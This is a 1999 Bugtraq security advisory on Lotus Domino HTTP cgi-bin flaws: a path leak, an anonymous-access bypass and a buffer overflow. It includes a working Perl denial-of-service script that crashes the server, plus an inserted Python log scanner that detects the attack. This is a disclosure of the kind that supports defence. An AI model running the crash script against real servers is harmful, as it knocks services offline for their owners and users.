Bugtraq mailing list archives
serious Lotus Domino HTTP denial of service
From: Alain.Thivillon () HSC FR (Alain Thivillon)
Date: Tue, 21 Dec 1999 11:42:13 +0100
Greetings,

The Lotus Domino HTTP server can be used as a traditional Web server, serving static HTML documents and handling cgi-bin scripts. These features are turned on by default and use the /cgi-bin virtual path, mapped to the <NOTESDATA>\domino\cgi-bin directory. When auditing these functions, we found three vulnerabilities in the handling of cgi requests:

1. The Domino server exposes the configuration of the local filesystem.

   When requesting http://server/cgi-bin/blabla, the HTTP response is:

   Error 500
   Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/blabla' is executable

   This can be used to obtain OS and installation details.

2. Turning off anonymous access in the server document of the Notes Name & Address Book has no effect for the cgi-bin directory: anonymous access is still permitted. The same applies to "SSL redirection of entire server": cgi-bin can still be accessed via the HTTP port.

3. Now the worst... The handling of the response to bad requests (see 1) is vulnerable to a buffer overflow: by sending a large URL relative to cgi-bin, the HTTP task crashes immediately and does not service requests anymore (including standard Notes database access by HTTP). If Domino is launched as an NT service, the service will not stop completely; you need to kill the remaining processes (using kill.exe from the Windows NT Resource Kit) or reboot Windows NT.

   We noticed that not all requests crash the server, but sending 'GET /cgi-bin/... (800 .) aaaa (4000 a) HTTP/1.0' kills nHTTP.exe every time. We were able to reproduce this on all 4.6.X series, including 4.6.6b, which seems to be the last version accessible on www.notes.net.

   I was not able to overwrite the return address (just DS), but I made very few tests, and the buffer overflow is maybe exploitable to execute arbitrary code.

I didn't test the denial of service on Unix versions, but problems 1. and 2. are present. The same remark applies to Domino 5.x.

We sent several emails to security () lotus com in the past 10 days; we received no answers nor bounces.
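Added here as a defender-side example (not part of the advisory or its demonstration script): a small Python scanner over constructed access-log lines that flags the two request patterns described above, a cgi-bin probe answered with Error 500 (problem 1) and an oversized URL under /cgi-bin/ (problem 3). The 512-character threshold and the log format are assumptions.

```python
import re

CGI_PREFIX = "/cgi-bin/"
# Assumed threshold (not from the advisory): no legitimate script name under
# /cgi-bin/ approaches this length, while the crashing request is 4800+ chars.
MAX_CGI_PATH_LEN = 512

# Common Log Format: client, identity, user, [time], "request", status, bytes
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return a finding label for one access-log line, or None if benign.

    'oversized-cgi-url': a /cgi-bin/ request far longer than any real script
        name, the pattern that crashes nHTTP.exe on Domino 4.6.x.
    'cgi-probe': a /cgi-bin/ request answered with 500, i.e. the
        "Bad script request" error that leaks the on-disk cgi-bin path.
    """
    m = CLF.match(line)
    if m is None or not m.group("path").startswith(CGI_PREFIX):
        return None
    if len(m.group("path")) > MAX_CGI_PATH_LEN:
        return "oversized-cgi-url"
    if m.group("status") == "500":
        return "cgi-probe"
    return None

def scan(log_text):
    """Scan a whole log; return (line_no, client, label) for each finding."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        label = classify(line)
        if label:
            findings.append((n, line.split(" ", 1)[0], label))
    return findings

# Constructed sample log (not captured from a real server).
_crash_path = CGI_PREFIX + "." * 800 + "a" * 4000
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [21/Dec/1999:11:42:13 +0100] "GET /cgi-bin/blabla HTTP/1.0" 500 87',
    '10.0.0.5 - - [21/Dec/1999:11:42:20 +0100] "GET /names.nsf?Open HTTP/1.0" 200 2048',
    '10.0.0.7 - - [21/Dec/1999:11:43:05 +0100] "GET /cgi-bin/report.pl HTTP/1.0" 200 512',
    '10.0.0.9 - - [21/Dec/1999:11:43:30 +0100] "GET %s HTTP/1.0" 500 0' % _crash_path,
])

if __name__ == "__main__":
    for n, client, label in scan(SAMPLE_LOG):
        print("line %d: %s -> %s" % (n, client, label))
```

Because the oversized request crashes nHTTP.exe before a response is written, it may never reach Domino's own log; a proxy or network capture in front of the server is the more reliable place to run this check.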
A demonstration script using the Perl LWP module is given below. A Nessus plugin will be available in a few hours on http://www.nessus.org/, thanks to Renaud Deraison.

Workaround:

If you don't use cgi-bin on your Domino server, change the cgi-bin virtual directory in the server document to something impossible to guess. Leaving the field empty has no effect. We didn't find a definitive way to stop cgi-bin handling.

Demonstration script:

#!/usr/bin/perl -w
# This will crash Lotus Domino Server (tested on 4.6.4, 4.6.5, 4.6.6 and
# 4.6.6b).
# (c) Alain Thivillon, Stephane Aubert and Herve Schauer Consultants 1999

use strict;
use LWP::UserAgent;
use HTTP::Request;

my $ua = LWP::UserAgent->new;
$ua->agent("a");

my $target = 'Insertyourtargetnamehere';
# 800 dots followed by 4000 'a' characters, relative to /cgi-bin/
my $url = "http://" . $target . "/cgi-bin/" . '.' x 800;
$url .= 'a' x 4000;

my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Well done, Joe\n";
}

--
Alain Thivillon -+- Alain.Thivillon () hsc fr -+- Hervé Schauer Consultants
The world is ending in 10 days, 12 hours, 45 min, 55 sec : save your buffers